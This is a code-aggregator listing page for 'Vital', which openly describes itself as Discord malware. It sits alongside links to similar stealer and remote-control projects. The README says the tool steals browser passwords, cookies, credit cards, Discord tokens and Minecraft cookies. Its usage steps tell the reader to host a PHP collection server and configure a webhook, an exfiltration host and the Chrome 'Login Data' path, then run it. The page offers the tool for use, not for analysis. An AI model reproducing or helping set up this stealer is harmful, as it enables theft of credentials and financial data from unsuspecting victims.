All Projects → rpie → Vital

rpie / Vital

Licence: other
Malware for Discord, designed to steal passwords, tokens, and inject discord folders for long-term use.

Programming Languages

python
139335 projects - #7 most used programming language
PHP
23972 projects - #3 most used programming language
javascript
184084 projects - #8 most used programming language

Projects that are alternatives of or similar to Vital

ToxicEye
👽 Program for remote control of windows computers via telegram bot. Written in C#
Stars: ✭ 305 (+510%)
Mutual labels:  malware, stealer
CockyGrabber
C# library for the collection of browser information such as cookies, logins, and more
Stars: ✭ 46 (-8%)
Mutual labels:  password, stealer
ItroublveTSC
Official Source of ItroublveTSC, totally open source. No virus or anything. Feel free to have a look :)
Stars: ✭ 82 (+64%)
Mutual labels:  password, stealer
Cerberus
A complete Grabber, sending data to a TCP server that you have to host and stocking all in a database.
Stars: ✭ 32 (-36%)
Mutual labels:  malware, stealer
secrets.clj
A library designed to generate cryptographically strong random numbers.
Stars: ✭ 64 (+28%)
Mutual labels:  password
HatVenom
HatVenom is a HatSploit native powerful payload generation tool that provides support for all common platforms and architectures.
Stars: ✭ 84 (+68%)
Mutual labels:  malware
macos-receiver
A MacOS TabBar (StatusBar) application that securely receives one-time passwords (OTPs) that you tapped in Raivo for iOS.
Stars: ✭ 44 (-12%)
Mutual labels:  password
TweetFeed
Collecting IOCs posted on Twitter
Stars: ✭ 181 (+262%)
Mutual labels:  malware
Windows-APT-Warfare
著作《Windows APT Warfare:惡意程式前線戰術指南》各章節技術實作之原始碼內容
Stars: ✭ 241 (+382%)
Mutual labels:  malware
Pwdb-Public
A collection of all the data i could extract from 1 billion leaked credentials from internet.
Stars: ✭ 2,529 (+4958%)
Mutual labels:  password
Father
LD_PRELOAD rootkit
Stars: ✭ 59 (+18%)
Mutual labels:  malware
maldetect
Debian packaging of Linux Malware Detect (https://github.com/rfxn/linux-malware-detect)
Stars: ✭ 48 (-4%)
Mutual labels:  malware
libopaque
c implementation of the OPAQUE protocol with bindings for python, php, ruby, lua, zig, java, erlang, golang and js.
Stars: ✭ 30 (-40%)
Mutual labels:  password
password-dart
A set of high-level APIs over PointyCastle and CryptoUtils to hash and verify passwords securely.
Stars: ✭ 40 (-20%)
Mutual labels:  password
Whitecomet-Research
Research on malware creation and protection
Stars: ✭ 62 (+24%)
Mutual labels:  malware
kubectl-gopass
Plugin for kubectl to support reading and writing secrets directly from/to gopass
Stars: ✭ 28 (-44%)
Mutual labels:  password
Automated-Malware-Analysis-List
My personal Automated Malware Analysis Sandboxes and Services
Stars: ✭ 20 (-60%)
Mutual labels:  malware
Malware-Machine-Learning
Malware Machine Learning
Stars: ✭ 26 (-48%)
Mutual labels:  malware
Lime-Downloader
Simple Malware Downloader
Stars: ✭ 93 (+86%)
Mutual labels:  malware
Dr0pFi
Using this tool, You can capture all WiFi Passwords stored on Windows Computer and mail them to your email account!
Stars: ✭ 38 (-24%)
Mutual labels:  malware

Vital

  • What is Vital?

    Vital is malware primarily used to collect and extract information from the Discord desktop client. While it has other features (MC stealer, browser tools) it really shines in this area.

  • Overview of Vital

    Vital has the ability to steal browser passwords, cookies, and credit cards. It also collects Discord tokens, Minecraft client cookies and can redirect the Discord client to an alternative web address.

  • Support / coverage

    Vital supports a plethora of Discord clients and browsers, from commonly used browsers such as Chrome and Firefox to lesser used browsers such as (i don't know)

Usage

Setup a webserver on either a local machine or a remote machine, hosting the PHP file. Once you have your local server setup, make sure to configure everything properly inside of main.py.

  • Example
WEBHOOK 	    = 	'https://discord.com/webhooks/idontfuckingknow'
REDIRECT 	    = 	''
HOST	 	    = 	'http://mydomain.org/'
CHROME_DATA 	    =   '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'
USERNAME	    =   os.environ.get('USERNAME')
APPDATA		    =   os.getenv('APPDATA')

DEBUG 		    = 	False

After this you can execute main.py and watch the magic happen!

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].